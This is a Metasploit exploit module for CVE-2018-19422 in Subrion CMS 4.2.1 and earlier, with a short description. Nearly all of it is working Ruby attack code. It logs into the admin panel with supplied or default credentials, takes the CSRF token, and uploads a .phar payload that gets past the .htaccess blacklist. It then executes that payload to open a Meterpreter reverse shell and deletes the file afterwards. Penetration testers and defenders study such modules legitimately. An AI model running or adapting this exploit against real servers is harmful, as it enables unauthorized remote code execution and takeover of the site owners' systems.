This Metasploit module exploits an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by the .htaccess file not preventing the execution of .pht, .phar, and .xhtml files. Files with these extensions are not included in the .htaccess blacklist, hence these files can be uploaded and executed to achieve remote code execution. In this module, a .phar file with a randomized name is uploaded and executed to receive a Meterpreter session on the target, then deletes itself afterwards.
advisories | CVE-2018-19422
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::PhpEXE
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE',
'Description' => %q{
This module exploits an authenticated file upload vulnerability in
Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by
the .htaccess file not preventing the execution of .pht, .phar, and
.xhtml files. Files with these extensions are not included in the
.htaccess blacklist, hence these files can be uploaded and executed
to achieve remote code execution. In this module, a .phar file with
a randomized name is uploaded and executed to receive a Meterpreter
session on the target, then deletes itself afterwards.
},
'License' => MSF_LICENSE,
'Author' => [
'Hexife', # Original discovery, PoC, and CVE submission
'Fellipe Oliveira', # ExploitDB author
'Ismail E. Dawoodjee' # Metasploit module author
],
'References' => [
[ 'EDB', '49876' ],
[ 'CVE', '2018-19422' ],
[ 'URL', 'https://github.com/intelliants/subrion/issues/801' ],
[ 'URL', 'https://github.com/intelliants/subrion/issues/840' ],
[ 'URL', 'https://github.com/advisories/GHSA-73xj-v6gc-g5p5' ]
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [
[
'PHP',
{
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :php,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
}
}
]
],
'Privileged' => false,
'DisclosureDate' => '2018-11-04',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
}
)
)
register_options(
[
Opt::RPORT(80, true, 'Subrion CMS default port'),
OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin' ]),
OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin' ])
]
)
end
def check
uri = normalize_uri(target_uri.path, 'panel/') # requires a trailing forward slash
print_status("Checking target web server for a response at: #{full_uri(uri)}")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
unless res
return CheckCode::Unknown('Target did not respond to check request.')
end
unless res.code == 200 && res.body.downcase.include?('subrion')
return CheckCode::Unknown('Target is not running Subrion CMS.')
end
print_good('Target is running Subrion CMS.')
# Powered by <a href="https://subrion.org/" title="Subrion CMS">Subrion CMS v4.2.1</a><br>
print_status('Checking Subrion CMS version...')
version_number = res.body.to_s.scan(/SubrionsCMSsv([d.]+)/).flatten.first
unless version_number
return CheckCode::Detected('Subrion CMS version cannot be determined.')
end
print_good("Target is running Subrion CMS Version #{version_number}.")
if Rex::Version.new(version_number) <= Rex::Version.new('4.2.1')
return CheckCode::Appears(
'However, this version check does not guarantee that the target is vulnerable, '
'since a fix for the vulnerability can easily be applied by a web admin.'
)
end
return CheckCode::Safe
end
def login_and_get_csrf_token(username, password)
print_status('Connecting to Subrion Admin Panel login page to obtain CSRF token...')
# Session cookies need to be kept to preserve the CSRF token across multiple requests
uri = normalize_uri(target_uri.path, 'panel/')
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'keep_cookies' => true
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Could not access the Subrion Admin Panel page.")
end
# <input type="hidden" name="__st" value="CA0S3w50vz1zRpdgZl98JAMVrimiXI63lKtxAwyi">
%r{name="__st" value="(?<csrf_token>[w+=/]+)">} =~ res.body
fail_with(Failure::NotFound, "#{peer} - Failed to get CSRF token.") if csrf_token.nil?
print_good("Successfully obtained CSRF token: #{csrf_token}")
print_status(
"Logging in to Subrion Admin Panel at: #{full_uri(uri)} "
"using credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}"
)
auth = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'keep_cookies' => true,
'vars_post' => {
'__st' => csrf_token,
'username' => username,
'password' => password
}
})
unless auth && auth.code == 200
fail_with(Failure::NoAccess, "#{peer} - Failed to log in, cannot access the Admin Panel page.")
end
%r{name="__st" value="(?<csrf_token_auth>[w+=/]+)">} =~ auth.body
unless csrf_token == csrf_token_auth && auth.body.downcase.include?('administrator')
fail_with(Failure::NoAccess, "#{peer} - Failed to log in, invalid credentials.")
end
print_good('Successfully logged in as Administrator.')
return csrf_token
end
def upload_and_execute_payload(csrf_token)
print_status('Preparing payload...')
# set `unlink_self: true` to delete the file after execution
payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.phar"
php_payload = get_write_exec_payload(unlink_self: true)
data = Rex::MIME::Message.new
data.add_part(Rex::Text.rand_text_alphanumeric(14), nil, nil, 'form-data; name="reqid"')
data.add_part('upload', nil, nil, 'form-data; name="cmd"')
data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
data.add_part(csrf_token, nil, nil, 'form-data; name="__st"')
data.add_part(
"#{php_payload}n",
'application/octet-stream',
nil,
"form-data; name="upload[]"; filename="#{payload_name}""
)
data.add_part(Time.now.getutc.to_i.to_s, nil, nil, 'form-data; name="mtime[]"')
print_status('Sending POST data...')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'panel', 'uploads', 'read.json'),
'keep_cookies' => true,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
unless res && res.code == 200
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload PHP payload.")
end
payload_uri = normalize_uri(target_uri.path, 'uploads', payload_name)
print_good("Successfully uploaded payload at: #{full_uri(payload_uri)}")
# This execution request returns nil
print_status("Executing '#{payload_name}'... This file will be deleted after execution.")
send_request_cgi({
'method' => 'GET',
'uri' => payload_uri,
'keep_cookies' => true
})
print_good("Successfully executed payload: #{full_uri(payload_uri)}")
end
def exploit
csrf_token = login_and_get_csrf_token(datastore['USERNAME'], datastore['PASSWORD'])
upload_and_execute_payload(csrf_token)
end
end
